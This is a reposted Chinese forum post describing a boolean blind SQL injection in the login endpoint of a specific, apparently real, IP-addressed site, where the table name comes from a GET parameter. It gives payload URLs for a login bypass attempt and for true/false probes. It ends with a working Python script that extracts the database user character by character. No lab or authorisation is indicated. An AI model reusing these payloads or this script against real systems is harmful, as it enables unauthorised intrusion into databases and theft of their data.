本文详细介绍了如何应对一种特殊的MySQL布尔型盲注情况,其中表名通过GET参数传递,导致无需单引号注入。在尝试使用万能密码登录时,由于登录过程伴随更新操作,使得常规方法失效。通过分析,作者发现了可以通过条件判断来执行SQL查询,并给出了Python脚本示例。同时,文章提到了SQLMAP对此类注入点可能无法识别,且分享了一个关于MySQL时间盲注的教程链接。
返回这么一个字符串
经过测试过滤了单引号,奇葩的是SQL语句中的表名是通过$_GET获取的,这样就不需要单引号注入了
但是问题又来了,这里是登录处的注入,按理说可以万能密码进去的,但是输入http://115.159.147.96/ap_Verify.php?a=nb_softuser`+where+1=1+–+&user=asdasdasdas&pass=A3DCB4D229DE6FDE0DB5686DEE47145D&key=8E7CACDD62339A1D7A100347055D9104&ver=163&soft=VM&num=EJGDCHHCDX&sid=32F91605-CA92228F
他妈的从select语句变成了update语句,当时有点懵,后来才想明白,这是因为登录不止执行了一条SQL语句,还会执行update语句更新收费会员的信息,这样万能密码就绕不过去了,还是得想办法跑数据啊。SQLMAP应该是不能识别这种注入点的。
http://115.159.147.96/ap_Verify.php?a=nb_softuser+where+1+=+1+and+if(ascii(mid(version(),1,1))=53,1,0)+--+&user=a&pass=a&key=a&ver=16&soft=VM条件成立时返回的页面 +where+1+=+1+and+if(ascii(mid(version(),1,1))=54,1,0)+–+&user=a&pass=a&key=a&ver=16&soft=VM条件不成立时返回的页面
http://115.159.147.96/ap_Verify.php?a=nb_softuser
写了个python脚本。
[Python] 纯文本查看 复制代码
import urllib2
import re
opener = urllib2.build_opener()
opener.addheaders.append((‘Cookie’, ‘ZDEDebuggerPresent=php,phtml,php3’))
payloads = ‘abcdefghijklmnopqrstuvwxyz0123456789@_.’
user = “”
for i in range(1,31):
for p in payloads:
s1 = "%s" %(i)
s2 = "%s" %(ord(p))
s = "http://115.159.147.96/ap_Verify.php?a=nb_softuser`+where+1+=+1+and+if(ord(mid(user(),"+s1+",1))="+s2+",1,0)+--+&user=a&pass=a&key=a&ver=16&soft=VM"
try:
req = urllib2.Request(s)
req_data=opener.open(req,timeout=20)
#print req_data.read()
if re.findall('fa27f303f2dc7138a4a05578daf7e4ac',req_data.read()):
user+=p
print '\n user is:',user,
else:
print '.',
except urllib2.URLError,e:
break
最后打个广告,mysql时间盲注教科书地址:
本帖隐藏的内容
http://www.f0rg3t.com/post/1de4895e_a4c9d97
本文转载自【http://bbs.ichunqiu.com/thread-10120-1-1.html?from=mysky】
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
